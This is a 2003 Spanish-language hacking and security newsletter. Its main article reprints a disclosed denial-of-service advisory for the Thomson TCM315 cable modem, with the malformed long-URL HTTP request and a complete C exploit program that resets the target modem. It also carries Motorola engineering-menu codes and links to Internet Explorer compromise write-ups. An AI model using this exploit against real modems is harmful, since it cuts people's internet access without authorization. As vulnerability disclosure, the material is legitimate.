RootMode - Nro: 8vo boletín
Boletín de seguridad informática de [RootMode]
Nro: 8vo boletín
Lunes, 15 de Diciembre de 2003
http://rootmode.com.ar
INDICE:
- Introducción
- El site
- Txt colgad0
- Artículos
- Buggie links
- Links
- The End
- ------------------------------------------------------------------
[1] Bueno, ya es el 8vo boletín de [RootMode] y el 2do boletín quincenal.
[El cual para no cortar la costumbre, sale a destiempo ;)]
- ---
[?] Razón?
Como les comente en el último correo, hay una mujer en mi vida, razón por la cual el tiempo se acorta mucho.
Pido disculpas por ello.
[2] El site
Las secciones del site nuevamente tienen password, para limitar el ancho de banda, y que este sea usado solo por miembros del boletín.
[+]Más info: http://rootmode.com.ar/password.php
- ---
[?]Como acceder a las secciones?
El acceso es el mismo de siempre, solo que cuando intentes descargar un archivo, te pedira el usuario y password.
- ---
[*]Recomendación:
http://rootmode.com.ar/cisco.php
[3] Txt colgad0
Motorola 8700
By nndRock
#06# for checking the IMEI (International Mobile Equipment Identity)
Activate RBS
(Note: pause means the * key held in until box appears)
To activate RBS type:
[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options'
function with the keys, and enable it.
De-activate RBS
To de-activate RBS type:
[pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]
This only works with some versions of software.
These countries has been reported working: AU, IT, SG, DE, ES, ZA
What's the use of RBS:
Get Distance From Base Station
Place a call, when it is answered, press [MENU] until 'Eng Field Option'
is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Get Signal Quality
press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
[4] Artículos
Denegación de servicio en Thomson TCM315
1 - Introducción
Thomson TCM315 es un cable modem con funcionalidades DOCSIS 2.0.
Sus principales características son:
- DOCSIS 1.0 certified
- DOCSIS 2.0 ready and DOCSIS 1.1 compliant
- NAT/PAT/Firewall and integrated router for SOHO installations (in a separate software release)
- Bridging between the USB and Ethernet port
- Easy Access to Advanced Diagnostics Web Pages
- USB port for easy installation
- Reliable high-performance platform
- Surf the Internet Up to 100 Times Faster than a 56k analog Modem
- Internet On-Off button for enhanced security
Más información en http://www.qb.ro/docs/tcm315.pdf
2 - Descripción de la vulnerabilidad
El problema aparece al enviar una petición HTTP con una cadena larga al cable modem, causando una denegación de servicio.
Ejemplo:
GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
or
http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
3 - Forma de explotar esta vulnerabilidad
Para probar esta vulnerabilidad, usamos el siguiente código. Nota: el código está escrito en C para sistemas Windows, es fácilmente
portable a sistemas Unix.
- --------------------- CUT HERE ---------------------
/*
ADVISORY - Thomson Cablemodem TCM315 Denial of Service
Shell security group (2003) www.shellsec.net
November 10 of 2003
Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: Users with access to the network can remotely shutdown
internet connection.
Discovered by: aT4r Andres[at]shellsec.net
Vendor: contacted (no answer)
Fix: no yet
usage: just, thdos.exe 192.168.100.1
*/
#include <stdio.h>
#include <winsock2.h>
void main(int argc,char *argv[]) {
char evil[150],buffer[1000];
struct sockaddr_in shellsec;
int fd;
WSADATA ws;
WSAStartup( MAKEWORD(1,1), &( ws) );
shellsec.sin_family = AF_INET;
shellsec.sin_port = htons(80);
shellsec.sin_addr.s_addr = inet_addr(argv[1]);
memset(evil,'\0',sizeof(evil));
memset(evil,'A',100);
sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1)
{
send(fd,buffer,strlen(buffer),0);
printf("done. Thomson Cablemodem reset!\n");
sleep(100);
}
else printf("Unable to connect to CM.\n");
}
- --------------------- CUT HERE ---------------------
4 - Solución
Thomson fue advertido sobre esta vulnerabilidad, pero no se ha pronunciado al respecto ni ha puesto un parche a disposición de los usuarios aún. Como posible solución se plantea filtrar las peticiones que se puedan realizar al cable modem.
Url: http://www.shellsec.net
[5] Buggie links
- New "Clean" IE Remote Compromise http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Content.htm
- MHTML Redirection Leads to Downloading EXE and Executing http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Content.htm
- BackToFramedJpu - a successor of BackToJpu attack http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-Content.htm
- HijackClickV2 - a successor of HijackClick attack http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-Content.htm
- Invalid ContentType may disclose cache directory http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Content.htm
- Cache Disclosure Leads to mycomputer Zone and Remote Compromise http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCa che-Content.htm
- IE Remote Compromise by Getting Cache Location http://www.safecenter.net/UMBRELLAWEBV4/execdror6
[6] Links
- Un sitio muy completo. Lectura obligada http://www.deabajo.com.ar
- El tío Google ... por si alguien no lo conoce ;) http://www.google.com
- Un muy buen material http://bookshelf.sleepnet.net/files/
[7] The End
Para terminar, esta frase que me envió mi amigo [Insomnia]. Es tal cual! ;)
- ---
"Los video juegos no tienen ninguna influencia sobre los niños.
Quiero decir, si el Pac-Man hubiese influenciado a nuestra generación, estaríamos todos corriendo en salas oscuras, masticando píldoras mágicas y escuchando músicas electrónicas repetitivas"
Kristian Wilson, Nintendo Inc., 1989
- ---
Saludos..
Zero_Byte mailto:info@rootmode.com.ar
- ------------------------------------
[Zero_Byte] info@rootmode.com.ar
Seguridad informática y Undeground
==> http://rootmode.com.ar <==
- ------------------------------------